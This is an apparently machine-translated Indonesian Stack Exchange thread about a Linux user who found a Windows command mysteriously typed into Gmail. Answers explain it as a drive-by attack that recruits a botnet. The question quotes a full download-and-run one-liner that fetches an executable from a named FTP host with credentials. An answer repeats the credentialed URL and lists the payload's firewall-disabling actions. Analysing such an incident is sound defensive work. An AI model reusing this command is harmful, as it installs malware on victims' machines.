Bagaimana cara mengidentifikasi apakah komputer Linux saya diretas?

128

PC rumahan saya biasanya hidup, tetapi monitor mati. Malam ini saya pulang kerja dan menemukan apa yang tampak seperti upaya hack: di browser saya, Gmail saya terbuka (itu saya), tetapi itu dalam mode penulisan dengan yang berikut di TObidang:

md / c gema buka cCTeamFtp.yi.org 21 >> ik & gema pengguna ccteam10 765824 >> ik & gema biner >> ik & gema dapatkan svcnost.exe >> ik & gema bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & keluar echo Anda dimiliki

Ini seperti kode baris perintah Windows bagi saya, dan mdawal kode dikombinasikan dengan fakta bahwa Gmail berada dalam mode penulisan, membuatnya jelas bahwa seseorang mencoba menjalankan cmdperintah. Saya kira saya beruntung karena sebenarnya saya tidak menjalankan Windows pada PC ini, tetapi saya memiliki orang lain yang melakukannya. Ini adalah pertama kalinya sesuatu seperti ini terjadi padaku. Saya bukan guru Linux, dan saya tidak menjalankan program lain selain Firefox pada saat itu.

Saya benar-benar yakin bahwa saya tidak menulis ini, dan tidak ada orang lain secara fisik di komputer saya. Juga, saya baru-baru ini mengubah kata sandi Google saya (dan semua kata sandi saya yang lain) menjadi sesuatu seperti vMA8ogd7bvjadi saya tidak berpikir bahwa seseorang meretas akun Google saya.

Apa yang baru saja terjadi? Bagaimana cara seseorang menekan tombol pada komputer saya ketika itu bukan mesin Windows lama nenek yang telah menjalankan malware selama bertahun-tahun, tetapi baru menginstal Ubuntu baru?

Pembaruan:
Biarkan saya membahas beberapa poin dan pertanyaan:

  • Saya di Austria, di pedesaan. Router WLAN saya menjalankan WPA2 / PSK dan kata sandi sedang-kuat yang tidak ada dalam kamus; harus brute-force dan kurang dari 50 meter dari sini; tidak mungkin itu diretas.
  • Saya menggunakan keyboard kabel USB, jadi sekali lagi sangat tidak mungkin ada orang yang bisa meretasnya.
  • Saya tidak menggunakan komputer saya pada saat itu; itu hanya diam di rumah saat aku sedang bekerja. Ini adalah nettop PC yang dipasang di monitor, jadi saya jarang mematikannya.
  • Mesin ini baru berumur dua bulan, hanya menjalankan Ubuntu, dan saya tidak menggunakan perangkat lunak aneh atau mengunjungi situs-situs aneh. Ini terutama Stack Exchange, Gmail, dan surat kabar. Tidak ada permainan. Ubuntu diatur untuk selalu memperbarui.
  • Saya tidak mengetahui adanya layanan VNC yang berjalan; Saya tentu saja belum menginstal atau mengaktifkannya. Saya juga belum memulai server lain. Saya tidak yakin apakah ada yang berjalan di Ubuntu secara default?
  • Saya tahu semua alamat IP dalam aktivitas akun Gmail. Saya cukup yakin Google bukan jalan masuk.
  • Saya menemukan Penampil Arsip Log , tetapi saya tidak tahu harus mencari apa. Tolong?

Yang benar-benar ingin saya ketahui adalah, dan apa yang benar-benar membuat saya merasa tidak aman, adalah: bagaimana orang dari Internet dapat menghasilkan penekanan tombol pada mesin saya? Bagaimana saya bisa mencegah hal itu tanpa harus repot-repot? Saya bukan pecandu Linux, saya seorang ayah yang mengotak-atik Windows selama 20+ tahun dan sudah bosan. Dan selama 18+ tahun online, saya belum pernah melihat upaya hack pribadi, jadi ini baru bagi saya.

Torben Gundtofte-Bruun
sumber
4
Apakah ada orang lain yang memiliki akses ke komputer Anda, atau apakah Anda memiliki keyboard nirkabel yang sangat lama? Selain itu, Ubuntu memiliki server VNC bawaan. Jika itu aktif, skrip acak di suatu tempat bisa terhubung dan menganggap itu adalah komputer windows, mengirimkan penekanan tombol WIN + R, cmd ......
TuxRug
29
@torbengb: Posting Anda benar-benar membuatku takut ...
Mehrdad
9
Apakah ada komputer lain di jaringan nirkabel Anda? Jika penyusup merusak keamanan mereka, itu akan memberinya "dalam" ke jaringan lokal Anda, yang dapat menyebabkan cracking kotak Ubuntu dengan berbagai cara.
CarlF
4
@muntoo ... dan yakin Anda belum menuliskannya di mana pun dan tidak menggunakan aplikasi apa pun untuk mengelolanya, bukan? Jangan memulai bashing kata sandi; setidaknya kata sandi saya bukan password:-)
Torben Gundtofte-Bruun
6
Apakah kamu punya kucing?
Zaki

Jawaban:

66

Saya ragu Anda memiliki sesuatu yang perlu dikhawatirkan. Kemungkinan besar serangan JavaScript yang mencoba melakukan drive dengan mengunduh . Jika Anda khawatir tentang hal ini, mulailah menggunakan NoScript dan AdBlock Plus Firefox Add-Ons.

Bahkan mengunjungi situs yang tepercaya Anda tidak aman karena mereka menjalankan kode JavaScript dari pengiklan pihak ketiga yang bisa berbahaya.

Saya mengambilnya dan menjalankannya dalam VM. Menginstal mirc dan ini adalah log status ... http://pastebin.com/Mn85akMk

Ini adalah serangan otomatis yang mencoba membuat Anda mengunduh mIRC dan bergabung dengan botnet yang akan mengubah Anda menjadi spambot ... Itu membuat VM saya bergabung dan membuat koneksi ke sejumlah alamat jarak jauh yang berbeda, salah satunya adalah autoemail-119.west320.com.

Menjalankannya di Windows 7 saya harus menerima UAC prompt dan mengizinkannya mengakses melalui firewall.

Tampaknya ada banyak laporan dari perintah yang tepat ini di forum lain, dan seseorang bahkan mengatakan bahwa file torrent mencoba untuk mengeksekusinya ketika sudah selesai mengunduh ... Saya tidak yakin bagaimana itu akan mungkin terjadi.

Saya belum pernah menggunakan ini sendiri, tetapi seharusnya bisa menunjukkan kepada Anda koneksi jaringan saat ini sehingga Anda dapat melihat apakah Anda terhubung dengan sesuatu yang tidak normal: http://netactview.sourceforge.net/download.html

Riguez
sumber
10
Eh, mengapa semua komentar (bahkan yang sangat sangat relevan yang menemukan bahwa skrip berusaha membuka cmdjendela) dihapus !?
BlueRaja - Danny Pflughoeft
Apakah saya akan sama amannya dari serangan semacam ini jika saya baru mulai menggunakan uBlock Origin?
RobotUnderscore
42

Saya setuju dengan @ jb48394 bahwa itu mungkin eksploitasi JavaScript, seperti yang lainnya hari ini.

Fakta bahwa ia mencoba untuk membuka cmdjendela (lihat komentar @ torbengb ) dan menjalankan perintah jahat, daripada hanya mengunduh trojan secara diam-diam di latar belakang, menunjukkan bahwa ia mengeksploitasi beberapa kerentanan di Firefox yang memungkinkannya untuk memasukkan stroke-key, tetapi tidak menjalankan kode.

Ini juga menjelaskan mengapa exploit ini, yang jelas ditulis khusus untuk Windows, juga akan bekerja di Linux: Firefox menjalankan JavaScript dengan cara yang sama di semua OS (setidaknya, ia mencoba untuk :)) . Jika itu disebabkan oleh buffer-overflow atau exploit serupa yang ditujukan untuk Windows, itu hanya akan membuat crash program.

Adapun dari mana kode JavaScript berasal - mungkin iklan Google berbahaya (siklus iklan di Gmail sepanjang hari) . Ini tidak akan menjadi yang pertama kalinya .

BlueRaja - Danny Pflughoeft
sumber
4
Referensi yang bagus.
kizzx2
9
FYI untuk skimmers, "tautan" terakhir itu sebenarnya adalah lima tautan terpisah.
Pops
Akan sangat mengejutkan jika ini benar-benar eksploitasi Javascript karena Firefox saya biasanya tetap terbuka selama berhari-hari. Namun, Anda perlu memanggil API khusus untuk mengirim kunci ke sistem lain di bawah Windows dan mungkin panggilan sistem yang berbeda (jika ada) di Linux. Karena mengirim penekanan tombol bukan operasi Javascript yang normal, saya ragu Firefox akan menerapkan panggilan lintas platform untuk itu.
billc.cn
1
@ billc.cn: Saya yakin menulis ke buffer keyboard PS / 2 berfungsi sama terlepas dari sistem operasi .
BlueRaja - Danny Pflughoeft
12

Saya menemukan serangan serupa di mesin Linux lain. Sepertinya itu semacam perintah FTP untuk Windows.

Shekhar
sumber
8
Lebih tepatnya, ini mengunduh dan menjalankan file ftp://ccteam10:[email protected]/svcnost.exemenggunakan ftpalat baris perintah Windows .
grawity
menemukannya di pastebin too pastebin.com/FXwRpKH4
Shekhar
di sini adalah info tentang situs whois.domaintools.com/216.210.179.67
Shekhar
9
Ini adalah paket SFX WinRAR yang berisi instalasi mIRC portabel dan file bernama "DriverUpdate.exe." DriverUpdate.exe mengeksekusi (setidaknya) dua perintah shell: firewall netsh menonaktifkan opmode dan taskkill / F / IM VCSPAWN.EXE / T Ia juga mencoba (saya pikir) untuk menambahkan die-freesms-seite.com ke zona tepercaya Internet Explorer dan bypass proxy.
Andrew Lambert
5

Ini tidak menjawab seluruh pertanyaan Anda, tetapi dalam pencarian file log untuk upaya login gagal.

Jika ada lebih dari sekitar lima upaya gagal dalam log Anda, maka seseorang mencoba untuk memecahkannya root. Jika ada upaya yang berhasil untuk masuk rootsaat Anda jauh dari komputer Anda, GANTI PASSWORD ANDA SEGERA !! Maksud saya SEKARANG JUGA! Lebih disukai untuk sesuatu yang alfanumerik, dan sekitar 10 karakter.

Dengan pesan yang Anda dapatkan ( echoperintah) ini benar-benar terdengar seperti beberapa script anak yang belum matang . Jika itu adalah seorang peretas sejati yang tahu apa yang dia lakukan, Anda mungkin masih tidak akan mengetahuinya.

Nate Koppenhaver
sumber
2
Saya setuju ini jelas sangat amatir. Setidaknya mereka seharusnya tidak menempatkan gaung yang Anda miliki pada akhirnya. Membuat saya bertanya-tanya apakah ada "peretas sejati" yang pernah berhasil? Atau memang aku harus bertanya, berapa?
Torben Gundtofte-Bruun
1
@torgengb: jika perintah dijalankan di command prompt windows, Anda tidak akan melihat gema (karena &exit)
BlueRaja - Danny Pflughoeft
-1

whois laporan west320.com dimiliki oleh Microsoft.

UPnP dan Vino (Sistem -> Preferensi -> Remote Desktop) dikombinasikan dengan kata sandi Ubuntu yang lemah?

Apakah Anda menggunakan repositori yang tidak standar?

DEF CON memiliki kompetisi Wi-Fi setiap tahun mengenai seberapa jauh titik akses Wi-Fi dapat dicapai - yang terakhir saya dengar adalah 250 mil.

Jika Anda benar-benar ingin takut, lihat screenshot dari pusat perintah-n-kontrol botnet Zeus . Tidak ada mesin yang aman, tetapi Firefox di Linux lebih aman daripada yang lain. Lebih baik lagi, jika Anda menjalankan SELinux .

rjt
sumber
1
Penulis eksploit ini jelas tidak berniat menjalankan ini di Linux, jadi saya ragu itu ada hubungannya dengan utilitas gnome yang rentan atau kata sandi yang lemah (juga, OP sudah menyebutkan ia memiliki kata sandi yang aman)
BlueRaja - Danny Pflughoeft
Sebenarnya, ia tidak menyebutkan memiliki kata sandi Ubuntu, hanya kata sandi gmail dan nirkabel. Seorang anak yang menjalankan metasploit bahkan mungkin tidak tahu tentang Linux, ia hanya melihat VNC. Kemungkinan besar serangan javascript.
rjt